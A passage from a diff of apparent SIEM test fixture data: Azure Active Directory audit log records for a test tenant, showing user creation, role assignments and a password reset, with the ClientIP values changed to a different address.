\"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"34c0d7a0-a70f-4668-9238-47f9fc208882\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"41c1e3a1-68e7-4a79-aad6-2b138065842f\",\r\n    \"ServiceInstance\": \"SCO\/PROD_AMSUB0601_03\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"c1ec4a95-1f05-45b3-a911-aa3fa01094f5\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"8474f4ab-55d9-4d35-bee0-7fd2a36bbe22\",\r\n    \"ServiceInstance\": \"OfficeForms\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"e212cbc7-0961-4c40-9825-01117710dcb1\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"ddb68c34-8603-4f67-89a2-b3a7ccd802a4\",\r\n    \"ServiceInstance\": \"Adallom\/Prod04\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"b56bb4d7-b53b-4c00-926c-e4bce0baf3e0\",\r\n    \"ServiceInstance\": \"MultiFactorService\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"8a256a2b-b617-496d-b51b-e76466e88db0\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"70163138-2060-4c53-83f1-863279967909\",\r\n    \"ServiceInstance\": \"RMSOnline\/EU\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"bea4c11e-220a-4e6d-8eb8-8ea15d019f90\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"ee9031e1-dcf2-4fbe-ae4a-c1b4a2a8d5a6\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"5136a095-5cf0-4aff-bec3-e84448b38ea5\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"a4efbea6-6482-4d5b-a772-6be1d48c10a0\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"efb0351d-3b08-4503-993d-383af8de41e3\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"d79ce029-d957-49f1-b7b3-bde340ec6327\",\r\n    \"ServiceInstance\": \"ProcessSimple\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"07699545-9485-468e-95b6-2fca3738be01\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"2ce2197c-fba9-4aff-85ab-cb4f2ac7010f\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"efb87545-963c-4e0d-99df-69c6916d9eb0\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"2e74bf19-8072-42c1-b197-7aab0ee2280c\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"9f431833-0334-42de-a7dc-70aa40db46db\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"6508f27b-8794-485b-8db3-4689620ff973\",\r\n    \"ServiceInstance\": \"RMSOnline\/EU\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"5689bec4-755d-4753-8b61-40975025187c\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"5faa8b43-3945-4977-a113-b09e5bb12eeb\",\r\n    \"ServiceInstance\": \"RMSOnline\/EU\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"6c57d4b6-3b23-47a5-9bc9-69f17b4947b3\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"61052816-0a02-4a30-86d6-280f0aac7651\",\r\n    \"ServiceInstance\": \"AzureAdvancedThreatAnalytics\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"14ab5db5-e6c4-4b20-b4bc-13e36fd2227f\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"686dc0ed-3e04-466d-9776-1b3fe571d8f8\",\r\n    \"ServiceInstance\": \"AADPremiumService\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"eec0eb4f-6444-4f95-aba0-50c24d67f998\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"7ae0b18b-03ae-4e23-88d0-9816c5772825\",\r\n    \"ServiceInstance\": \"AADPremiumService\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"41781fb2-bc02-4b7c-bd55-b576c07bb09d\"\r\n  }\r\n]","OldValue":"[]"},{"Name":"PasswordPolicies","NewValue":"[\r\n  \"None\"\r\n]","OldValue":"[]"},{"Name":"ProxyAddresses","NewValue":"[\r\n  \"SMTP:eve@testsiem4.onmicrosoft.com\"\r\n]","OldValue":"[]"},{"Name":"StsRefreshTokensValidFrom","NewValue":"[\r\n  \"2021-02-04T16:00:04Z\"\r\n]","OldValue":"[]"},{"Name":"UserPrincipalName","NewValue":"[\r\n  \"eve@testsiem4.onmicrosoft.com\"\r\n]","OldValue":"[]"},{"Name":"UserType","NewValue":"[\r\n  \"Member\"\r\n]","OldValue":"[]"},{"Name":"Included Updated Properties","NewValue":"AccountEnabled, AssignedLicense, AssignedPlan, PasswordPolicies, ProxyAddresses, StsRefreshTokensValidFrom, UserPrincipalName, UserType","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"fce62f3b-f563-49f4-8331-a16989900c83","IntraSystemId":"8c72b235-d3dc-475b-b0d6-8065ac53326a","SupportTicketId":"","Target":[{"ID":"User_43399311-1c28-4cce-a8bc-7e6e791473f2","Type":2},{"ID":"43399311-1c28-4cce-a8bc-7e6e791473f2","Type":2},{"ID":"User","Type":2},{"ID":"eve@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200113AE1D62","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:00:19","Id":"8de563f4-6388-4526-9447-422181f8dd55","Operation":"Update user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"root@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"b0e2b807-3c81-465b-988f-04fd297ad069","IntraSystemId":"56714e13-0a0c-4689-97fa-3fb60ca2c384","SupportTicketId":"","Target":[{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2},{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-04T16:31:54","Id":"a969d068-cac3-4ba2-a894-0ec9de403d28","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"20.190.129.100","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"cc5cbfa4-d24e-4060-9a46-4c8d447b0adf","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Global Reader","OldValue":""},{"Name":"Role.TemplateId","NewValue":"f2ef992c-3afb-46b9-b7cf-a126ee74c451","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"GlobalReaders","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"20.190.129.100","InterSystemsId":"84317188-8bc0-48b2-be29-4d7d013d87cc","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
+{"CreationTime":"2021-02-04T16:31:54","Id":"a969d068-cac3-4ba2-a894-0ec9de403d28","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"81.2.69.145","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"cc5cbfa4-d24e-4060-9a46-4c8d447b0adf","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Global Reader","OldValue":""},{"Name":"Role.TemplateId","NewValue":"f2ef992c-3afb-46b9-b7cf-a126ee74c451","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"GlobalReaders","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"81.2.69.145","InterSystemsId":"84317188-8bc0-48b2-be29-4d7d013d87cc","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:32:42","Id":"8577f8df-4d23-44a2-b07c-3e09c5252f89","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"124fda77-abec-48b1-953a-7d3b1c6fdbda","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:32:42","Id":"f94fd47b-4dde-41e5-acc8-9d75946e499e","Operation":"Reset user password.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"124fda77-abec-48b1-953a-7d3b1c6fdbda","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-04T16:31:54","Id":"82693d84-baef-46a1-8b47-6a203ce7c75f","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"20.190.129.100","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"79bcbf54-dbd5-4fcc-8bf2-ab789e9a97da","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Helpdesk Administrator","OldValue":""},{"Name":"Role.TemplateId","NewValue":"729827e3-9c14-49f7-bb1b-9608f156bbb8","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"HelpdeskAdmins","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"20.190.129.100","InterSystemsId":"ba292e5a-eb25-4c5e-950f-d56d9b92e5e3","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-04T16:32:42","Id":"fa3a0492-4781-412a-b27e-2c23c15e542e","Operation":"Update user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"52.109.68.40","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"52.109.68.40","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-04T16:32:42","Id":"608f941b-1724-49d9-b2f2-7c97898270f0","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"52.109.68.40","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"52.109.68.40","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
+{"CreationTime":"2021-02-04T16:31:54","Id":"82693d84-baef-46a1-8b47-6a203ce7c75f","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"81.2.69.145","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"79bcbf54-dbd5-4fcc-8bf2-ab789e9a97da","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Helpdesk Administrator","OldValue":""},{"Name":"Role.TemplateId","NewValue":"729827e3-9c14-49f7-bb1b-9608f156bbb8","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"HelpdeskAdmins","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 